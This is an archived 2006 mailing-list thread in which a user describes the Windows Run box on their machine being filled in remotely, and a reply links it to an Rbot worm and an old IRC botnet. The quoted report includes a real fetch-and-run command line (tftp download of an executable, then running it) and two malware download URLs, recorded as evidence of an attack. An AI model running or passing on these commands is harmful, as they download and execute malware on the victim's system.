Sounds like:
http://www.avira.com/en/threats/section/fulldetails/id_vir/1496/worm_rbot.aeu.79.html

BTW, tried the IRC server, it's down. Sounds like an old botnet.

I've also stumbled across (and misplaced) a website that claimed it could come from using a web browser that supports VBS.

Regards & good luck,
Peter

On 05/10/06, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks? Any suggestions to prevent this particular exploit (START/Run)?
>
> Thanks,
> Carey
> --
> http://www.piclist.com PIC/SX FAQ & list archive
> View/change your membership options at
> http://mailman.mit.edu/mailman/listinfo/piclist